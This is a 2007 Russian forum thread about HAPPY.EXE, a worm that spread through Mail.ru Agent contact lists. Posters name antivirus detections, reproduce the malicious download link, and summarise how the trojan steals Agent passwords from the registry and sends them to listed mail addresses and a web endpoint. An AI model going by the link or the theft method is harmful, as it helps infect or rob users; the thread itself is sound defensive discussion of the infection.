| Сейчас на форуме: zds (+7 невидимых) |
 |
eXeL@B —› Крэки, обсуждения —› HAPPY.EXE атакует MAIL.RU ? |
| Посл.ответ | Сообщение |
|
|
Создано: 02 февраля 2007 11:27 · Поправил: Модератор · Личное сообщение · #1 Вроде ничего по теме не нашёл. Так вот через Майл ру агент пересылаются сообщения пришедшие от кого-либо из вашего контакт листа с поздравлением и ссылкой на открытку, по ссылке скачивается файл HAPPY.EXE... Кто-нть уже разбирал этого зверя? [ удалено ] // первое пердупреждение!  |
|
|
Создано: 02 февраля 2007 12:05 · Поправил: gegter · Личное сообщение · #2 а зачем сюда запостил? отправь на сайты антивирусов или на mail.ru - они точно меры предпримут добавлено: P.S. drweb определяет его как BACKDOOR.PWS.Trojan - все понятно? |
|
|
Создано: 02 февраля 2007 12:12 · Личное сообщение · #3 С утра пришло мне от сестры. Ссылка на открытку otkpbltku.vu/love/2575/?A349551F523E737515 - если не присматриваться, то "типа отрытки" бтительность ноль, т.к. пришло от своих, исполняешь файл- ничего, забиваешь, спрашиваешь "а что, собственно, за праздник?" и двигаешься дальше...))) Так вот к этому моменту почти весь мой контакт лист получил "от меня" поздравления с каким-то праздником" 
Судя по всему эта штука так и работает...но безвредный ли этот стёб на 100%...ведь попутно он может творить всё что угодно. |
|
|
Создано: 02 февраля 2007 12:14 · Личное сообщение · #4 gegter Запостил: 1. Предупредить 2. Разве не интересно поковырять новый троян? |
|
|
Создано: 02 февраля 2007 12:15 · Поправил: MACKLIA · Личное сообщение · #5 NOD молчит. Залил к Касперскому http://www.kaspersky.ru/scanforvirus http://www.kaspersky.ru/scanforvirus показал такую штуку happy.exe - инфицирован IM-Worm.Win32.Sramota.e А вот ,что про него пишут: IM-Worm — черви, использующие интернет-пейджеры Известные компьютерные черви данного типа используют единственный способ распространения — рассылку на обнаруженные контакты (из контакт-листа) сообщений, содержащих URL на файл, расположенный на каком-либо веб-сервере. Данный прием практически полностью повторяет аналогичный способ рассылки, использующийся почтовыми червями. ----- Что один человек сделал , другой всегда сломать может... |
|
|
Создано: 02 февраля 2007 12:18 · Поправил: gegter · Личное сообщение · #6 VOLKOFF пишет: С утра пришло мне от сестры. 
VOLKOFF пишет: Так вот к этому моменту почти весь мой контакт лист получил "от меня" поздравления с каким-то праздником" а вот это 
VOLKOFF пишет: но безвредный написано ж троян. должен пасы от твоих ящиков тырить - пасс к mail.ru агенту в памяти лежит не шиырованный. много раз приводился код выдергивающий их оттуда + сюда приклеить сырец троя + скомпилировать - работы немного было автору. MACKLIA пишет: NOD молчит nod в топку!!! у мну доктор с базами устаревшими на месяц ито определил... |
|
|
Создано: 02 февраля 2007 12:21 · Поправил: VOLKOFF · Личное сообщение · #7 Так это теперь эпидемия на весь МАЙЛ.РУ....ничего не напоминает? Не так давно это было 
ПРЕДУПРЕЖДЕНИЕ БЕЗОСНОВАТЕЛЬНО, УЧИТЫВАЯ, КАК ВСЁ БЫЛО ПРЕПОДНЕСЕНО это вместо спасиба....ню, ню... Зачем закрывать тему тоже непонятно... Модератора однозначно не асилил: аттач = ссылка на 100%, однако ссылка на месте, а сыр-бор из-за аттача да и нельзя было этот вопрос задать абстрактно, без сабжа...гостеприимству оперативно среагировавшему на столь непростительное противоправное деяние с моей стороны - респект.
|
|
|
Создано: 02 февраля 2007 12:22 · Личное сообщение · #8 VOLKOFF пишет: Так это теперь эпидемия на весь МАЙЛ.РУ.... такие эпидэмии каждый день... т.к. юзаете дубовые анитивиры. VOLKOFF пишет: Разве не интересно поковырять новый троян? нэт! |
|
|
Создано: 03 февраля 2007 02:35 · Личное сообщение · #9 Отрыл поток по просьбе автора. Если начнется флуд - будет опять закрыт. |
|
|
Создано: 03 февраля 2007 03:01 · Поправил: VOLKOFF · Личное сообщение · #10 gegter пишет: а зачем сюда запостил? отправь на сайты антивирусов или на mail.ru - они точно меры предпримут Здравствуйте! Уважаемый пользователь, Вам не стоило загружать незнакомые приложения, мы не можем обезопасить пользователей Агента от их неаккуратности. Также неприемлимо что мы запретим возможность написания ссылок в тексте сообщения. Воспользуйтесь антивирусным ПО, если Ваш Касперский определит вирус, он автоматически удалит его. Вот такой ответ пришёл с Майлру. И в чём-то они правы, но это явная дыра в Агенте и игнорировать это неразумно с их стороны. Спохватятся когда придет 100-1000 писем? 
Кстати размер файла по ссылкам со вчерашнего дня изменился. В аттаче был в 2 раза меньше, чем по вышеприведённой ссылке теперь... |
|
|
Создано: 03 февраля 2007 03:08 · Личное сообщение · #11 VOLKOFF Ну и собственно вопрос - ваши предложения? Какова цель создания топика? Я бы не запускал к примеру ехе, ссылки на которые шлют по асе или мылу. Или уточнил бы, что это за хрень... |
|
|
Создано: 03 февраля 2007 03:28 · Поправил: VOLKOFF · Личное сообщение · #12 Ara, По запарке бывает всё- без вариантов. Я как-то тоже не страдаю ламерскими привычками и за всё время заражений было лишь два (одно не в счет, т.к. сам зверя написал ). Ну нельзя же всех поголовно научить всему и вся, большинство с трудом осиливает чудеса Н.Т.П....
Повторюсь: Цель создания топика в первую очередь дать знать о такой вот засаде ( и не будем криччать, что мол никто здесь на это бы не повелся- повелись бы и ещё как), и во вторую- исследовать заразу (может зря весь крик ), интересующиеся здесь есть. |
|
|
Создано: 03 февраля 2007 03:38 · Личное сообщение · #13 Смешно... писать такое надо на пользовательском сайте, а не здесь. |
|
|
Создано: 03 февраля 2007 03:45 · Поправил: VOLKOFF · Личное сообщение · #14 Freecod И сколько пользователей знают что такое дизассемблер? 
Ты однозначно прав только в том, что тему бы кинуть в оффтоп, но это по понятным причинам отменяется. Да и вообще, к чему столько пафоса? Никто не должен ни до чего "снисходить", интересно- отпишись, не интересно- читай другие темы, неформатные топики в итоге всё равно подчищают, если сочтут нужным. Достаточно относиться друг к друку с долей уважения. |
|
|
Создано: 03 февраля 2007 03:53 · Поправил: Infernal_Terror · Личное сообщение · #15 VOLKOFF пишет: но это явная дыра в Агенте и игнорировать это неразумно с их стороны Аффтар, ты гениален!! Ты открыл мне глаза на то, что мой компьютер дыряв целиком и полностью! Представь себе, мой броузер отображает ссылку http://otkpbltku.vu/love/2575/?A349551F523E737515, http://otkpbltku.vu/love/2575/?A349551F523E737515, а значит он дырявый! А также дырява ОС, которая допускает такое безобразие, и дыряв даже монитор, на котором я эту ссылку вижу!! А также дырявы все протоколы интернета, раз они допускают скачку вирусов по ссылкам! Аффтар, советую написать о своем удивительном открытии на жолтые страницы http://www.securitylab.ru/, http://www.securitylab.ru/, а потом написать о дыре в мелкософт и всем производителям железа, которые допускают такое! Ну а лучше убей сибя, так как твой случай лечению не поддается. |
|
|
Создано: 03 февраля 2007 03:54 · Личное сообщение · #16 Честно говоря. не совсем понимаю к чему это все.... Одно время юзал агента только потому, чтоб было интересно чего это за штука, а потом плюнул на него, гавно гавном, спамеры срут уже и там, проблем из-за него много, и еще и зараза через него лезет.... И снес его нафиг, жалкая пародия на аналог аськи, только очень не дотягивает.... так что причин юзать его я не вижу.... Ни одной... p.S. А чтобы не было вопросов, что такой антивирь гавно, а этот нет, не юзайте их, используйте лючше проактивку, антивири уже вчерашний день.... ----- The blood swap.... |
|
|
Создано: 03 февраля 2007 03:58 · Поправил: VOLKOFF · Личное сообщение · #17 Infernal_Terror Читай внимательно, будет меньше глупых ответов.
Johnson Finger На самом деле Агент имеет ряд специфических "удобностей", напрямую не связанных с его прямым предназначением, но это офффтоп. Я тоже не любитель антивирей и пользуюсь ими в исключительных случаях, а вот проактивкой может и стоит заморочиться, хотя это тоже офффтоп... |
|
|
Создано: 03 февраля 2007 04:06 · Личное сообщение · #18 VOLKOFF майлру агент сам запускает екзешники по ссылкам? VOLKOFF пишет: Читай внимательно, будет меньше глупых ответов. Пей больше йаду, будет меньше глупых топегов. |
|
|
Создано: 03 февраля 2007 04:17 · Поправил: gegter · Личное сообщение · #19 VOLKOFF слей куда-нить и скинь мне ссыль на эту заразу в ЛС, гляну хоть чем паковали, желательно и первый и второй варьянт |
|
|
Создано: 03 февраля 2007 05:13 · Поправил: gegter · Личное сообщение · #20 happy2.exe - вирус Win32.HLLM.Fire happy.exe - трой, пакован AsPack, умеет копировать себя, читать файлы, лезет в реестр \Software\Mail.Ru\Agent\mra_logins обзывает себя FireWorm3000, отправляет пасы на fireworm3000@mail.ru, v3y55j7aw@mail.ru, возможно также на xzxzxzx@mail.ru, s464cs@mail.ru все через сервер smtp.mail.ru, кроме того умеет менять пароли. в запросе на смену пароля серверу отсылает старый пароль, новый пароль, повтор новый пароль. после смены пароля посылает методом POST hттp://class.avtograd.ru/v2/Class/STK/SavePassword.Asp HTTP/1.1 Host: class.avtograd.ru причем посылает и старый пасс и новый Написан на Borland Delphi 7.0 - я уважая вирусы на асме
|
|
|
Создано: 03 февраля 2007 05:13 · Поправил: VOLKOFF · Личное сообщение · #21 PEiD выдаёт ASPack 2.12 -> Alexey Solodovnikov по первому и EXEStealth 2.76 Unregistered -> WebtoolMaster * по текущему варианту... gegter Спасиб! По большей части именно ради этой инфы и был создан топик. Берите пример! 
|
|
|
Создано: 03 февраля 2007 05:44 · Личное сообщение · #22 VOLKOFF пишет: По большей части именно ради этой инфы и был создан топик. Берите пример! а сразу сказать было слабо? зы. за реверс троев вообще-то деньги платят ;) ----- Тут не могла быть ваша реклама |
|
|
Создано: 03 февраля 2007 05:59 · Поправил: VOLKOFF · Личное сообщение · #23 lord_Phoenix пишет: а сразу сказать было слабо? VOLKOFF пишет: по ссылке скачивается файл HAPPY.EXE... Кто-нть уже разбирал этого зверя? -мой первый пост
А про деньги...я ж не для личной выгоды...а общественной пользы для ;) одно ведь дело делаем
P.S. gegter, там хитрых механизмов самосохранения-активации нет? Хватит отката системы и смены пассов и.т.п ящиков мэйла из реестра HKEY_CURRENT_USERSoftwareMail.RuAgentmra_logins? Вроде бы следов не осталось кроме как в кэше Оперы + Касперский добавил эту дрянь в вирусную базу, теперь палит
|
|
|
Создано: 03 февраля 2007 22:10 · Личное сообщение · #24 VOLKOFF пишет: И сколько пользователей знают что такое дизассемблер? А тех кто знает, о вирусной угрозе и предупреждать не надо. А разбирать вирус... А что в этом интерестного? Считают файл с паролями нортона, сопрут в реестре пас на диалап, пас из ICQ. Пошлют всё это дело на мыло. Если захочет так и в бот-сеть запихает. И в прот всё это дело. Просто жутко интересно. |
|
|
Создано: 04 февраля 2007 01:24 · Личное сообщение · #25 Так как у меня в агенте околы 1000 контакотов, мне столько "поздравлений" пришло, что я примерно минут пять окна закрывал. Это примерно токо с моего листа заразили около 400... Короче просто надо меньше ссылки левые нажимать вот и все
|
|
|
Создано: 06 февраля 2007 04:05 · Поправил: VOLKOFF · Личное сообщение · #26 Freecod пишет: А разбирать вирус... А что в этом интерестного? На момент создания топика был информационный вакуум по сабжу, в то время как он продолжал стремительно распостраняться, стандартные меры были предприняты, однако, было принято во внимание и то, что банальной кражей информации дело могло не ограничиться. Так что первое для чего это было нужно - "малой кровью" устранить последствия. Не стоит возвращаться к разговору о том какой антивирус лучше и актуальны ли антивирусы в принципе, и о том что не стоит открывать никаких "подозрительных" ссылок, лазить голыми руками в электрощиток, переходить улицу на красный свет и есть незнакомые ягоды влесу...
Признаюсь, мне проще написать "безпалевный" вирус (уже этим не занимаюсь), чем разбирать нечто подобное, однако иногда достаточно интересно видеть нестандартные решения, новые подходы, использовать которые, зачастую можно и в мирных целях, да и для общего развития не вредно
ИМХО так. Не будем разводить пустых споров. С третьего числа я про эту "дрянь" уже успел забыть
Не думаю, что автор этого троя сильно продвинет свое творение, но если что отпишитесь в тему.
|
|
eXeL@B —› Крэки, обсуждения —› HAPPY.EXE атакует MAIL.RU ? |
Для печати